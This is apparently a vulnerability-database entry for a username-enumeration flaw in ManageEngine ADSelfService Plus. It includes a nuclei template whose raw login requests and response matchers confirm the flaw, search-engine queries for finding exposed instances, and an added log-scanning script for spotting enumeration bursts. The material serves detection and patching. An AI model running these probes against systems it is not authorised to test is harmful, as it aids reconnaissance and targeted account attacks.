Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

Published: 01 Jul 2026 03:36:47. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 13 views.

Zoho ManageEngine ADSelfService Plus 6121 has username enumeration (CVE-2022-28987); update to 6202+.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2022-28987 | 20 May 2022 03:15 | attackerkb
Circl | CVE-2022-28987 | 20 May 2022 07:30 | circl
CNNVD | ZOHO ManageEngine ADSelfService Plus security vulnerability | 20 May 2022 00:00 | cnnvd
CVE | CVE-2022-28987 | 20 May 2022 02:10 | cve
Cvelist | CVE-2022-28987 | 20 May 2022 02:10 | cvelist
EUVD | EUVD-2022-33418 | 3 Oct 2025 20:07 | euvd
NVD | CVE-2022-28987 | 20 May 2022 03:15 | nvd
OSV | CVE-2022-28987 | 20 May 2022 03:15 | osv
Prion | Design/Logic Flaw | 20 May 2022 03:15 | prion
Positive Technologies | PT-2022-19345 | 20 May 2022 00:00 | ptsecurity

Code

id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.09705
    epss-percentile: 0.94914
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220167ffa80a6eb52f1cb0d41732c412254305473e40c6a8b18c9cb1ebb5a5d108f022057fb8a33a2dd2d93255ef3263cbab5c95e3bffa9e7be6932b6e28afb9cdce9e8:922c64590222798bb761d5b6d8e72950
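A defender-side companion to the template above, added here and not part of the original page or of the nuclei project: it scans web-server access-log lines for the traffic pattern that abuse of this flaw produces, a burst of POST requests to /ServletAPI/accounts/login from a single client. The combined-log format, the thresholds and the sample lines are assumptions; the sample log is constructed, not real traffic.

```python
import re
from collections import defaultdict
from datetime import datetime

# Endpoint probed by the nuclei template on this page.
LOGIN_PATH = "/ServletAPI/accounts/login"

# Assumed Apache/nginx combined-log layout (assumption, not from the page).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def find_enumeration_bursts(lines, threshold=10, window_seconds=60):
    """Return {ip: peak_count} for clients that POSTed to LOGIN_PATH at least
    `threshold` times inside some sliding window of `window_seconds`."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == LOGIN_PATH:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it fits in window_seconds.
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def constructed_sample_log():
    # Constructed sample: 12 rapid POSTs from one client, two slow POSTs from
    # another, and an unrelated GET. Addresses are documentation ranges.
    fmt = '{ip} - - [01/Jul/2026:03:36:{sec:02d} +0000] "{m} {p} HTTP/1.1" 200 94'
    lines = [fmt.format(ip="203.0.113.7", sec=s, m="POST", p=LOGIN_PATH) for s in range(12)]
    lines += [fmt.format(ip="198.51.100.5", sec=s, m="POST", p=LOGIN_PATH) for s in (5, 50)]
    lines.append(fmt.format(ip="198.51.100.5", sec=20, m="GET", p="/"))
    return lines
```

Tune `threshold` and `window_seconds` to the normal login rate of the instance; the request bodies (and thus the probed usernames) are not in access logs, so this keys on request volume only.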


Vulners AI Score (as of 04 Feb 2026 07:00): 6, medium risk
CVSS 2: 5
CVSS 3.1: 5.3
EPSS: 0.09705
Views: 13